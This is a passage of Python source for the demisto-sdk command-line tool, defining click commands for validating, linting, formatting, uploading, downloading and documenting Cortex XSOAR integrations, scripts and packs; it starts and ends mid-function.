try:\n config = ConfigParser(allow_no_value=True)\n config.read(config_file_path)\n\n if command in config.sections():\n for key in config[command]:\n if key in args:\n # if the key exists in the args we will run it over if it is either:\n # a - a flag currently not set and is defined in the conf file\n # b - not a flag but an arg that is currently None and there is a value for it in the conf file\n if args[key] is False and config[command][key] in true_synonyms:\n args[key] = True\n\n elif args[key] is None and config[command][key] is not None:\n args[key] = config[command][key]\n\n # if the key does not exist in the current args, add it\n else:\n if config[command][key] in true_synonyms:\n args[key] = True\n\n else:\n args[key] = config[command][key]\n\n except MissingSectionHeaderError:\n pass\n\n\n@click.group(invoke_without_command=True, no_args_is_help=True, context_settings=dict(max_content_width=100), )\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-v', '--version', help='Get the demisto-sdk version.',\n is_flag=True, default=False, show_default=True\n)\n@pass_config\ndef main(config, version):\n config.configuration = Configuration()\n if not os.getenv('DEMISTO_SDK_SKIP_VERSION_CHECK') or version: # If the key exists/called to version\n cur_version = get_distribution('demisto-sdk').version\n last_release = get_last_remote_release_version()\n print_warning(f'You are using demisto-sdk {cur_version}.')\n if last_release and cur_version != last_release:\n print_warning(f'however version {last_release} is available.\\n'\n f'You should consider upgrading via \"pip3 install --upgrade demisto-sdk\" command.')\n\n\n# ====================== split-yml ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input', help='The yml file to extract from', required=True\n)\n@click.option(\n '-o', '--output', required=True,\n help=\"The output dir to write the extracted code/description/image to.\"\n)\n@click.option(\n '--no-demisto-mock',\n help=\"Don't add an import for demisto mock.\",\n is_flag=True,\n 
show_default=True\n)\n@click.option(\n    '--no-common-server',\n    help=\"Don't add an import for CommonServerPython.\",\n    is_flag=True,\n    show_default=True\n)\n@click.option(\n    '--no-auto-create-dir',\n    help=\"Don't auto create the directory if the target directory ends with *Integrations/*Scripts.\",\n    is_flag=True,\n    show_default=True\n)\n@click.option(\n    '--no-pipenv',\n    help=\"Don't auto create pipenv for requirements installation.\",\n    is_flag=True,\n    show_default=True\n)\n@pass_config\ndef split_yml(config, **kwargs):\n    \"\"\"Split the code, image and description files from a Demisto integration or script yaml file\n    to multiple files (to a package format - https://demisto.pan.dev/docs/package-dir).\n    \"\"\"\n    check_configuration_file('split-yml', kwargs)\n    file_type: FileType = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n    if file_type not in [FileType.INTEGRATION, FileType.SCRIPT]:\n        print_error('File is not an Integration or Script.')\n        return 1\n    extractor = Extractor(configuration=config.configuration, file_type=file_type.value, **kwargs)\n    return extractor.extract_to_package_format()\n\n\n# ====================== extract-code ====================== #\n@main.command(hidden=True)\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '--input', '-i',\n    help='The yml file to extract from',\n    required=True\n)\n@click.option(\n    '--output', '-o',\n    required=True,\n    help=\"The output file to write the code to\"\n)\n@click.option(\n    '--no-demisto-mock',\n    help=\"Don't add an import for demisto mock, false by default\",\n    is_flag=True,\n    show_default=True\n)\n@click.option(\n    '--no-common-server',\n    help=\"Don't add an import for CommonServerPython. \"\n         \"If not specified, will import unless this is CommonServerPython\",\n    is_flag=True,\n    show_default=True\n)\n@pass_config\ndef extract_code(config, **kwargs):\n    \"\"\"Extract code from a Demisto integration or script yaml file.\"\"\"\n    check_configuration_file('extract-code', kwargs)\n    file_type: FileType = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n    if file_type not in [FileType.INTEGRATION, FileType.SCRIPT]:\n        print_error('File is not an Integration or Script.')\n        return 1\n    extractor = Extractor(configuration=config.configuration, file_type=file_type.value, **kwargs)\n    # the option above is named '--output', so the extracted code path lives under kwargs['output']\n    return extractor.extract_code(kwargs['output'])\n\n\n# ====================== unify ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    \"-i\", \"--input\", help=\"The directory path to the files to unify\", required=True, type=click.Path(dir_okay=True)\n)\n@click.option(\n    \"-o\", \"--output\", help=\"The output dir to write the unified yml to\", required=False\n)\n@click.option(\n    \"--force\", help=\"Forcefully overwrites the preexisting yml if one exists\",\n    is_flag=True,\n    show_default=False\n)\ndef unify(**kwargs):\n    \"\"\"Unify code, image, description and yml files to a single Demisto yml file. 
Note that\n    this should be used on a single integration/script, not on a pack\n    or multiple scripts/integrations.\n    \"\"\"\n    check_configuration_file('unify', kwargs)\n    # Input is of type Path.\n    kwargs['input'] = str(kwargs['input'])\n    unifier = Unifier(**kwargs)\n    unifier.merge_script_package_to_yml()\n    return 0\n\n\n# ====================== validate ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '--no-conf-json', is_flag=True,\n    default=False, show_default=True, help='Skip conf.json validation')\n@click.option(\n    '-s', '--id-set', is_flag=True,\n    default=False, show_default=True, help='Perform validations using the id_set file.')\n@click.option(\n    \"-idp\", \"--id-set-path\", help=\"The path of the id-set.json used for validations.\",\n    type=click.Path(resolve_path=True))\n@click.option(\n    '--prev-ver', help='Previous branch or SHA1 commit to run checks against.')\n@click.option(\n    '--no-backward-comp', is_flag=True, show_default=True,\n    help='Whether to check backward compatibility or not.')\n@click.option(\n    '-g', '--use-git', is_flag=True, show_default=True,\n    default=False,\n    help='Validate changes using git - this will check current branch\'s changes against origin/master. '\n         'If the --post-commit flag is supplied: validation will run only on the current branch\'s changed files '\n         'that have been committed. '\n         'If the --post-commit flag is not supplied: validation will run on all changed files in the current branch, '\n         'both committed and not committed. ')\n@click.option(\n    '--post-commit',\n    is_flag=True,\n    help='Whether the validation should run only on the current branch\'s committed changed files. '\n         'This applies only when the -g flag is supplied.'\n)\n@click.option(\n    '--staged',\n    is_flag=True,\n    help='Whether the validation should ignore unstaged files. '\n         'This applies only when the -g flag is supplied.'\n)\n@click.option(\n    '-iu', '--include-untracked',\n    is_flag=True,\n    help='Whether to include untracked files in the validation.'\n)\n@click.option(\n    '-a', '--validate-all', is_flag=True, show_default=True, default=False,\n    help='Whether to run all validations on all files or not.'\n)\n@click.option(\n    '-i', '--input', type=click.Path(exists=True, resolve_path=True),\n    help='The path of the content pack/file to validate specifically.'\n)\n@click.option(\n    '--skip-pack-release-notes', is_flag=True,\n    help='Skip validation of pack release notes.')\n@click.option(\n    '--print-ignored-errors', is_flag=True,\n    help='Print ignored errors as warnings.')\n@click.option(\n    '--print-ignored-files', is_flag=True,\n    help='Print which files were ignored by the command.')\n@click.option(\n    '--no-docker-checks', is_flag=True,\n    help='Whether to skip docker image validation.')\n@click.option(\n    '--silence-init-prints', is_flag=True,\n    help='Whether to skip the initialization prints.')\n@click.option(\n    '--skip-pack-dependencies', is_flag=True,\n    help='Skip validation of pack dependencies.')\n@click.option(\n    '--create-id-set', is_flag=True,\n    help='Whether to create the id_set.json file.')\n@click.option(\n    '-j', '--json-file', help='The JSON file path to which to output the command results.')\n@click.option(\n    '--skip-schema-check', is_flag=True,\n    help='Whether to skip the file schema check.')\n@click.option(\n    '--debug-git', is_flag=True,\n    help='Whether to print debug logs for git statuses.')\n@click.option(\n    '--print-pykwalify', is_flag=True,\n    help='Whether to print the pykwalify log errors.')\n@click.option(\n    \"--quite-bc-validation\",\n    help=\"Set backwards compatibility validation's errors as warnings\",\n    is_flag=True)\n@pass_config\ndef validate(config, **kwargs):\n    \"\"\"Validate your content files. If no additional flags are given, will validate only committed files.\"\"\"\n    check_configuration_file('validate', kwargs)\n    sys.path.append(config.configuration.env_dir)\n\n    file_path = kwargs['input']\n\n    if kwargs['post_commit'] and kwargs['staged']:\n        print_error('Could not supply the staged flag with the post-commit flag')\n        sys.exit(1)\n    try:\n        is_external_repo = tools.is_external_repository()\n        # default validate to -g --post-commit\n        if not kwargs.get('validate_all') and not kwargs['use_git'] and not file_path:\n            kwargs['use_git'] = True\n            kwargs['post_commit'] = True\n        validator = ValidateManager(\n            is_backward_check=not kwargs['no_backward_comp'],\n            only_committed_files=kwargs['post_commit'], prev_ver=kwargs['prev_ver'],\n            skip_conf_json=kwargs['no_conf_json'], use_git=kwargs['use_git'],\n            file_path=file_path,\n            validate_all=kwargs.get('validate_all'),\n            validate_id_set=kwargs['id_set'],\n            skip_pack_rn_validation=kwargs['skip_pack_release_notes'],\n            print_ignored_errors=kwargs['print_ignored_errors'],\n            is_external_repo=is_external_repo,\n            print_ignored_files=kwargs['print_ignored_files'],\n            no_docker_checks=kwargs['no_docker_checks'],\n            silence_init_prints=kwargs['silence_init_prints'],\n            skip_dependencies=kwargs['skip_pack_dependencies'],\n            id_set_path=kwargs.get('id_set_path'),\n            staged=kwargs['staged'],\n            create_id_set=kwargs.get('create_id_set'),\n            json_file_path=kwargs.get('json_file'),\n            skip_schema_check=kwargs.get('skip_schema_check'),\n            debug_git=kwargs.get('debug_git'),\n            include_untracked=kwargs.get('include_untracked'),\n            quite_bc=kwargs.get('quite_bc_validation')\n        )\n        return validator.run_validation()\n    except (git.InvalidGitRepositoryError, git.NoSuchPathError, FileNotFoundError) as e:\n        print_error(e)\n        print_error(\"\\nYou may not be running `demisto-sdk validate` command in the content directory.\\n\"\n                    \"Please run the command from the content directory\")\n        sys.exit(1)\n\n\n# ====================== create-content-artifacts ====================== #\n@main.command(hidden=True)\n@click.help_option(\n    '-h', '--help'\n)\n@click.option('-a', '--artifacts_path', help='Destination directory to create the artifacts.',\n              type=click.Path(file_okay=False, resolve_path=True), required=True)\n@click.option('--zip/--no-zip', help='Zip content artifacts folders', default=True)\n@click.option('--packs', help='Create only content_packs artifacts.', is_flag=True)\n@click.option('-v', '--content_version', help='The content version in CommonServerPython.', default='0.0.0')\n@click.option('-s', '--suffix', help='Suffix to add to all yaml/json/yml files in the created artifacts.')\n@click.option('--cpus',\n              help='Number of cpus/vcpus available - only required when the os does not reflect the number of cpus '\n                   '(CircleCI always shows 32, but medium has 3).', hidden=True, default=os.cpu_count())\n@click.option('-idp', '--id-set-path', help='The full path of id_set.json', hidden=True,\n              type=click.Path(exists=True, resolve_path=True))\n@click.option('-p', '--pack-names',\n              help=(\"Packs to create artifacts for. Optional values are: `all` or \"\n                    \"csv list of packs. 
\"\n                    \"Default is set to `all`\"),\n              default=\"all\", hidden=True)\n@click.option('-sk', '--signature-key', help='Base64 encoded signature key used for signing packs.', hidden=True)\n@click.option('-sd', '--sign-directory', help='Path to the signDirectory executable file.',\n              type=click.Path(exists=True, resolve_path=True), hidden=True)\n@click.option('-rt', '--remove-test-playbooks', is_flag=True,\n              help='Should remove test playbooks from content packs or not.', default=True, hidden=True)\ndef create_content_artifacts(**kwargs) -> int:\n    \"\"\"Generating the following artifacts:\n    1. content_new - Contains all content objects of type json, yaml (from_version < 6.0.0)\n    2. content_packs - Contains all packs from Packs - Ignoring internal files (to_version >= 6.0.0).\n    3. content_test - Contains all test scripts/playbooks (from_version < 6.0.0)\n    4. content_all - Contains all from content_new and content_test.\n    5. uploadable_packs - Contains zipped packs that are ready to be uploaded to a Cortex XSOAR machine.\n    \"\"\"\n    logging_setup(3)\n    check_configuration_file('create-content-artifacts', kwargs)\n    artifacts_conf = ArtifactsManager(**kwargs)\n    return artifacts_conf.create_content_artifacts()\n\n\n# ====================== secrets ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '-i', '--input', help='Specify the file to check secrets on.'\n)\n@click.option(\n    '--post-commit',\n    is_flag=True,\n    show_default=True,\n    help='Whether the secrets check is done after you committed your files, '\n         'this will help the command to determine which files it should check in its '\n         'run. Before you commit the files it should not be used. Mostly for build '\n         'validations.'\n)\n@click.option(\n    '-ie', '--ignore-entropy',\n    is_flag=True,\n    help='Ignore entropy algorithm that finds secret strings (passwords/api keys)'\n)\n@click.option(\n    '-wl', '--whitelist',\n    default='./Tests/secrets_white_list.json',\n    show_default=True,\n    help='Full path to whitelist file, file name should be \"secrets_white_list.json\"'\n)\n@click.option(\n    '--prev-ver',\n    help='The branch against which to run secrets validation'\n)\n@pass_config\ndef secrets(config, **kwargs):\n    \"\"\"Run the secrets validator to catch sensitive data before exposing your code to a public repository.\n    Attach a path to a whitelist file to allow manual whitelisting.\n    \"\"\"\n    check_configuration_file('secrets', kwargs)\n    sys.path.append(config.configuration.env_dir)\n    secrets_validator = SecretsValidator(\n        configuration=config.configuration,\n        is_circle=kwargs['post_commit'],\n        ignore_entropy=kwargs['ignore_entropy'],\n        white_list_path=kwargs['whitelist'],\n        input_path=kwargs.get('input')\n    )\n    return secrets_validator.run()\n\n\n# ====================== lint ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    \"-i\", \"--input\", help=\"Specify directory(s) of integration/script\",\n    type=PathsParamType(exists=True, resolve_path=True)\n)\n@click.option(\"-g\", \"--git\", is_flag=True, help=\"Will run only on changed packages\")\n@click.option(\"-a\", \"--all-packs\", is_flag=True, help=\"Run lint on all directories in content repo\")\n@click.option('-v', \"--verbose\", count=True, help=\"Verbosity level -v / -vv / .. 
/ -vvv\",\n type=click.IntRange(0, 3, clamp=True), default=2, show_default=True)\n@click.option('-q', \"--quiet\", is_flag=True, help=\"Quiet output, only output results in the end\")\n@click.option(\"-p\", \"--parallel\", default=1, help=\"Run tests in parallel\", type=click.IntRange(0, 15, clamp=True),\n show_default=True)\n@click.option(\"--no-flake8\", is_flag=True, help=\"Do NOT run flake8 linter\")\n@click.option(\"--no-bandit\", is_flag=True, help=\"Do NOT run bandit linter\")\n@click.option(\"--no-xsoar-linter\", is_flag=True, help=\"Do NOT run XSOAR linter\")\n@click.option(\"--no-mypy\", is_flag=True, help=\"Do NOT run mypy static type checking\")\n@click.option(\"--no-vulture\", is_flag=True, help=\"Do NOT run vulture linter\")\n@click.option(\"--no-pylint\", is_flag=True, help=\"Do NOT run pylint linter\")\n@click.option(\"--no-test\", is_flag=True, help=\"Do NOT test (skip pytest)\")\n@click.option(\"--no-pwsh-analyze\", is_flag=True, help=\"Do NOT run powershell analyze\")\n@click.option(\"--no-pwsh-test\", is_flag=True, help=\"Do NOT run powershell test\")\n@click.option(\"-kc\", \"--keep-container\", is_flag=True, help=\"Keep the test container\")\n@click.option(\"--prev-ver\", default='master', help=\"Previous branch or SHA1 commit to run checks against\")\n@click.option(\"--test-xml\", help=\"Path to store pytest xml results\", type=click.Path(exists=True, resolve_path=True))\n@click.option(\"--failure-report\", help=\"Path to store failed packs report\",\n type=click.Path(exists=True, resolve_path=True))\n@click.option(\"-lp\", \"--log-path\", help=\"Path to store all levels of logs\",\n type=click.Path(resolve_path=True))\n@click.option(\"-j\", \"--json-file\", help=\"The JSON file path to which to output the command results.\",\n type=click.Path(resolve_path=True))\ndef lint(**kwargs):\n \"\"\"Lint command will perform:\n 1. Package in host checks - flake8, bandit, mypy, vulture.\n 2. 
Package in docker image checks - pylint, pytest, powershell - test, powershell - analyze.\n    Meant to be used with integrations/scripts that use the folder (package) structure.\n    Will look up what docker image to use and will set up the dev dependencies and files in the target folder.\n    If no additional flags specifying the packs are given, will lint only changed files.\n    \"\"\"\n    logging_setup(verbose=kwargs.get('verbose'),  # type: ignore[arg-type]\n                  quiet=kwargs.get('quiet'),  # type: ignore[arg-type]\n                  log_path=kwargs.get('log_path'))  # type: ignore[arg-type]\n\n    check_configuration_file('lint', kwargs)\n    lint_manager = LintManager(\n        input=kwargs.get('input'),  # type: ignore[arg-type]\n        git=kwargs.get('git'),  # type: ignore[arg-type]\n        all_packs=kwargs.get('all_packs'),  # type: ignore[arg-type]\n        verbose=kwargs.get('verbose'),  # type: ignore[arg-type]\n        quiet=kwargs.get('quiet'),  # type: ignore[arg-type]\n        prev_ver=kwargs.get('prev_ver'),  # type: ignore[arg-type]\n        json_file_path=kwargs.get('json_file')  # type: ignore[arg-type]\n    )\n    return lint_manager.run_dev_packages(\n        parallel=kwargs.get('parallel'),  # type: ignore[arg-type]\n        no_flake8=kwargs.get('no_flake8'),  # type: ignore[arg-type]\n        no_bandit=kwargs.get('no_bandit'),  # type: ignore[arg-type]\n        no_mypy=kwargs.get('no_mypy'),  # type: ignore[arg-type]\n        no_vulture=kwargs.get('no_vulture'),  # type: ignore[arg-type]\n        no_xsoar_linter=kwargs.get('no_xsoar_linter'),  # type: ignore[arg-type]\n        no_pylint=kwargs.get('no_pylint'),  # type: ignore[arg-type]\n        no_test=kwargs.get('no_test'),  # type: ignore[arg-type]\n        no_pwsh_analyze=kwargs.get('no_pwsh_analyze'),  # type: ignore[arg-type]\n        no_pwsh_test=kwargs.get('no_pwsh_test'),  # type: ignore[arg-type]\n        keep_container=kwargs.get('keep_container'),  # type: ignore[arg-type]\n        test_xml=kwargs.get('test_xml'),  # type: ignore[arg-type]\n        failure_report=kwargs.get('failure_report')  # type: ignore[arg-type]\n    )\n\n\n# ====================== format ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    \"-i\", \"--input\", help=\"The path of the script yml file\\n\"\n                          \"If no input is specified, the format will be executed on all new/changed files.\",\n    type=click.Path(exists=True, resolve_path=True))\n@click.option(\n    \"-o\", \"--output\", help=\"The path where the formatted file will be saved to\",\n    type=click.Path(resolve_path=True))\n@click.option(\n    \"-fv\", \"--from-version\", help=\"Specify fromversion of the pack\")\n@click.option(\n    \"-nv\", \"--no-validate\", help=\"Set when validate on file is not wanted\", is_flag=True)\n@click.option(\n    \"-ud\", \"--update-docker\", help=\"Set if you want to update the docker image of the integration/script\", is_flag=True)\n@click.option(\n    \"-v\", \"--verbose\", help=\"Verbose output\", is_flag=True)\n@click.option(\n    \"-y\", \"--assume-yes\",\n    help=\"Automatic yes to prompts; assume 'yes' as answer to all prompts and run non-interactively\",\n    is_flag=True)\ndef format(\n    input: Path,\n    output: Path,\n    from_version: str,\n    no_validate: bool,\n    update_docker: bool,\n    verbose: bool,\n    assume_yes: bool\n):\n    \"\"\"Run formatter on a given script/playbook/integration/incidentfield/indicatorfield/\n    incidenttype/indicatortype/layout/dashboard/classifier/mapper/widget/report file.\n    \"\"\"\n    return format_manager(\n        str(input) if input else None,\n        str(output) if output else None,\n        from_version=from_version,\n        no_validate=no_validate,\n        update_docker=update_docker,\n        assume_yes=assume_yes,\n        
verbose=verbose\n )\n\n\n# ====================== upload ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\",\n help=\"The path of file or a directory to upload. The following are supported:\\n\"\n \"- Pack\\n\"\n \"- A content entity directory that is inside a pack. For example: an Integrations \"\n \"directory or a Layouts directory.\\n\"\n \"- Valid file that can be imported to Cortex XSOAR manually. For example a playbook: \"\n \"helloWorld.yml\", required=True\n)\n@click.option(\n \"--insecure\",\n help=\"Skip certificate validation\", is_flag=True\n)\n@click.option(\n \"-v\", \"--verbose\",\n help=\"Verbose output\", is_flag=True\n)\ndef upload(**kwargs):\n \"\"\"Upload integration to Demisto instance.\n DEMISTO_BASE_URL environment variable should contain the Demisto server base URL.\n DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n * Note: Uploading classifiers to Cortex XSOAR is available from version 6.0.0 and up. *\n \"\"\"\n check_configuration_file('upload', kwargs)\n uploader = Uploader(**kwargs)\n return uploader.upload()\n\n\n# ====================== download ====================== #\n\n\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-o\", \"--output\", help=\"The path of a package directory to download custom content to\", required=False,\n multiple=False)\n@click.option(\n \"-i\", \"--input\", help=\"Custom content file name to be downloaded. Can be provided multiple times\",\n required=False, multiple=True)\n@click.option(\n \"--insecure\", help=\"Skip certificate validation\", is_flag=True)\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output\", is_flag=True)\n@click.option(\n \"-f\", \"--force\", help=\"Whether to override existing files or not\", is_flag=True)\n@click.option(\n \"-lf\", \"--list-files\", help=\"Prints a list of all custom content files available to be downloaded\", is_flag=True)\n@click.option(\n \"-a\", \"--all-custom-content\", help=\"Download all available custom content files\", is_flag=True)\n@click.option(\n \"-fmt\", \"--run-format\", help=\"Whether to run demisto-sdk format on downloaded files or not\", is_flag=True)\ndef download(**kwargs):\n \"\"\"Download custom content from Demisto instance.\n DEMISTO_BASE_URL environment variable should contain the Demisto server base URL.\n DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n \"\"\"\n check_configuration_file('download', kwargs)\n downloader: Downloader = Downloader(**kwargs)\n return downloader.download()\n\n\n# ====================== run ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-q\", \"--query\", help=\"The query to run\", required=True)\n@click.option(\n \"--insecure\", help=\"Skip certificate validation\", is_flag=True)\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output\", is_flag=True)\n@click.option(\n \"-D\", \"--debug\", help=\"Whether to enable the debug-mode feature or not, if you want to save the output file \"\n \"please use the --debug-path option\", is_flag=True)\n@click.option(\n \"--debug-path\", help=\"The path to save the debug file at, if not specified the debug file will be printed to the \"\n \"terminal\")\n@click.option(\n \"--json-to-outputs\", help=\"Whether to run json_to_outputs command on the context output of the query. 
If the \"\n                                  \"context output does not exist or the `-r` flag is used, will use the raw\"\n                                  \" response of the query\", is_flag=True)\n@click.option(\n    \"-p\", \"--prefix\", help=\"Used with `json-to-outputs` flag. Output prefix e.g. Jira.Ticket, VirusTotal.IP, \"\n                           \"the base path for the outputs that the script generates\")\n@click.option(\n    \"-r\", \"--raw-response\", help=\"Used with `json-to-outputs` flag. Use the raw response of the query for\"\n                                 \" `json-to-outputs`\", is_flag=True)\ndef run(**kwargs):\n    \"\"\"Run integration command on remote Demisto instance in the playground.\n    DEMISTO_BASE_URL environment variable should contain the Demisto base URL.\n    DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n    \"\"\"\n    check_configuration_file('run', kwargs)\n    runner = Runner(**kwargs)\n    return runner.run()\n\n\n# ====================== run-playbook ====================== #\n@main.command()\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    '--url', '-u',\n    help='URL to a Demisto instance. You can also specify the URL as an environment variable named: DEMISTO_BASE_URL'\n)\n@click.option(\n    '--playbook_id', '-p',\n    help=\"The playbook ID to run.\",\n    required=True\n)\n@click.option(\n    '--wait', '-w', is_flag=True,\n    help=\"Wait until the playbook run is finished and get a response.\"\n)\n@click.option(\n    '--timeout', '-t',\n    default=90,\n    show_default=True,\n    help=\"Timeout for the command. The playbook will continue to run in Demisto\"\n)\n@click.option(\n    \"--insecure\", help=\"Skip certificate validation\", is_flag=True)\ndef run_playbook(**kwargs):\n    \"\"\"Run a playbook in Demisto.\n    DEMISTO_API_KEY environment variable should contain a valid Demisto API Key.\n    Example: DEMISTO_API_KEY=<API_KEY> demisto-sdk run-playbook -p 'p_name' -u\n    'https://demisto.local'.\n    \"\"\"\n    check_configuration_file('run-playbook', kwargs)\n    playbook_runner = PlaybookRunner(**kwargs)\n    return playbook_runner.run_playbook()\n\n\n# ====================== json-to-outputs ====================== #\n@main.command('json-to-outputs')  # To not shadow the json_to_outputs import\n@click.help_option(\n    '-h', '--help'\n)\n@click.option(\n    \"-c\", \"--command\", help=\"Command name (e.g. xdr-get-incidents)\", required=True)\n@click.option(\n    \"-i\", \"--input\",\n    help=\"Valid JSON file path. If not specified, the script will wait for user input in the terminal. \"\n         \"The response can be obtained by running the command with `raw-response=true` argument.\",\n    required=False)\n@click.option(\n    \"-p\", \"--prefix\", help=\"Output prefix like Jira.Ticket, VirusTotal.IP, the base path for the outputs that the \"\n                           \"script generates\", required=True)\n@click.option(\n    \"-o\", \"--output\", help=\"Output file path, if not specified then will print to stdout\", required=False)\n@click.option(\n    \"-v\", \"--verbose\", is_flag=True, help=\"Verbose output - mainly for debugging purposes\")\n@click.option(\n    \"--interactive\", help=\"If passed, then for each output field will ask user interactively to enter the \"\n                          \"description. By default, interactive mode is disabled\", is_flag=True)\ndef json_to_outputs_command(**kwargs):\n    \"\"\"Demisto integrations/scripts have a YAML file that defines them.\n    Creating the YAML file is a tedious and error-prone task of manually copying outputs from the API result to the\n    file/UI/PyCharm. 
This script auto generates the YAML for a command from the JSON result of the relevant API call\n \"\"\"\n check_configuration_file('json-to-outputs', kwargs)\n json_to_outputs(**kwargs)\n\n\n# ====================== generate-test-playbook ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n required=True,\n help='Specify integration/script yml path')\n@click.option(\n '-o', '--output',\n required=False,\n help='Specify output directory')\n@click.option(\n '-n', '--name',\n required=True,\n help='Specify test playbook name')\n@click.option(\n '--no-outputs', is_flag=True,\n help='Skip generating verification conditions for each output contextPath. Use when you want to decide which '\n 'outputs to verify and which not')\n@click.option(\n \"-v\", \"--verbose\", help=\"Verbose output for debug purposes - shows full exception stack trace\", is_flag=True)\ndef generate_test_playbook(**kwargs):\n \"\"\"Generate test playbook from integration or script\"\"\"\n check_configuration_file('generate-test-playbook', kwargs)\n file_type: FileType = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n if file_type not in [FileType.INTEGRATION, FileType.SCRIPT]:\n print_error('Generating test playbook is possible only for an Integration or a Script.')\n return 1\n generator = PlaybookTestsGenerator(file_type=file_type.value, **kwargs)\n generator.run()\n\n\n# ====================== init ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-n\", \"--name\", help=\"The name of the directory and file you want to create\", required=True)\n@click.option(\n \"--id\", help=\"The id used in the yml file of the integration or script\"\n)\n@click.option(\n \"-o\", \"--output\", help=\"The output dir to write the object into. The default one is the current working \"\n \"directory.\")\n@click.option(\n '--integration', is_flag=True, help=\"Create an Integration based on BaseIntegration template\")\n@click.option(\n '--script', is_flag=True, help=\"Create a Script based on BaseScript example\")\n@click.option(\n \"--pack\", is_flag=True, help=\"Create pack and its sub directories\")\n@click.option(\n \"-t\", \"--template\", help=\"Create an Integration/Script based on a specific template.\\n\"\n \"Integration template options: HelloWorld, HelloIAMWorld, FeedHelloWorld.\\n\"\n \"Script template options: HelloWorldScript\")\n@click.option(\n '--demisto_mock', is_flag=True,\n help=\"Copy the demistomock. Relevant for initialization of Scripts and Integrations within a Pack.\")\n@click.option(\n '--common_server', is_flag=True,\n help=\"Copy the CommonServerPython. Relevant for initialization of Scripts and Integrations within a Pack.\")\ndef init(**kwargs):\n \"\"\"Initialize a new Pack, Integration or Script.\n If the script/integration flags are not present, we will create a pack with the given name.\n Otherwise when using the flags we will generate a script/integration based on your selection.\n \"\"\"\n check_configuration_file('init', kwargs)\n initiator = Initiator(**kwargs)\n initiator.init()\n return 0\n\n\n# ====================== generate-docs ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n \"-i\", \"--input\", help=\"Path of the yml file.\", required=True)\n@click.option(\n \"-o\", \"--output\", help=\"The output dir to write the documentation file into,\"\n \" documentation file name is README.md. 
If not specified, will be in the yml dir.\",\n    required=False)\n@click.option(\n    \"-uc\", \"--use_cases\", help=\"For integration - Top use-cases. Number the steps by '*' (i.e. '* foo. * bar.')\",\n    required=False)\n@click.option(\n    \"-c\", \"--command\", help=\"Comma-separated command names to generate docs for; the rest of the commands will be \"\n                            \"ignored, e.g. (xdr-get-incidents,xdr-update-incident)\",\n    required=False\n)\n@click.option(\n    \"-e\", \"--examples\", help=\"Integrations: path for file containing command examples.\"\n                             \" Each command should be in a separate line.\"\n                             \" Scripts: the script example surrounded by quotes.\"\n                             \" For example: -e '!ConvertFile entry_id='\")\n@click.option(\n    \"-p\", \"--permissions\", type=click.Choice([\"none\", \"general\", \"per-command\"]), help=\"Permissions needed.\",\n    required=True, default='none')\n@click.option(\n    \"-cp\", \"--command_permissions\", help=\"Path for file containing commands permissions.\"\n                                        \" Each command's permissions should be in a separate line.\"\n                                        \" (i.e. ' Administrator READ-WRITE')\", required=False)\n@click.option(\n    \"-l\", \"--limitations\", help=\"Known limitations. Number the steps by '*' (i.e. '* foo. * bar.')\", required=False)\n@click.option(\n    \"--insecure\", help=\"Skip certificate validation to run the commands in order to generate the docs.\",\n    is_flag=True)\n@click.option(\n    \"-v\", \"--verbose\", is_flag=True, help=\"Verbose output - mainly for debugging purposes.\")\ndef generate_docs(**kwargs):\n    \"\"\"Generate documentation for integration, playbook or script from yaml file.\"\"\"\n    check_configuration_file('generate-docs', kwargs)\n    input_path: str = kwargs.get('input', '')\n    output_path = kwargs.get('output')\n    command = kwargs.get('command')\n    examples = str(kwargs.get('examples', ''))\n    permissions = kwargs.get('permissions')\n    limitations = kwargs.get('limitations')\n    insecure: bool = kwargs.get('insecure', False)\n    verbose: bool = kwargs.get('verbose', False)\n\n    # validate inputs\n    if input_path and not os.path.isfile(input_path):\n        print_error(F'Input file {input_path} was not found.')\n        return 1\n\n    if not input_path.lower().endswith('.yml'):\n        print_error(F'Input {input_path} is not a valid yml file.')\n        return 1\n\n    if output_path and not os.path.isdir(output_path):\n        print_error(F'Output directory {output_path} was not found.')\n        return 1\n\n    if command:\n        if output_path and (not os.path.isfile(os.path.join(output_path, \"README.md\"))) \\\n                or (not output_path) \\\n                and (not os.path.isfile(os.path.join(os.path.dirname(os.path.realpath(input_path)), \"README.md\"))):\n            print_error(\"The `command` argument must be provided alongside existing `README.md` docs.\")\n            return 1\n\n    file_type = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n    if file_type not in [FileType.INTEGRATION, FileType.SCRIPT, FileType.PLAYBOOK]:\n        print_error('File is not an Integration, Script or a Playbook.')\n        return 1\n\n    print(f'Start generating {file_type.value} documentation...')\n    if file_type == FileType.INTEGRATION:\n        use_cases = kwargs.get('use_cases')\n        command_permissions = kwargs.get('command_permissions')\n        return generate_integration_doc(input_path=input_path, output=output_path, use_cases=use_cases,\n                                        examples=examples, permissions=permissions,\n                                        command_permissions=command_permissions, limitations=limitations,\n                                        insecure=insecure, verbose=verbose, command=command)\n    elif file_type == FileType.SCRIPT:\n  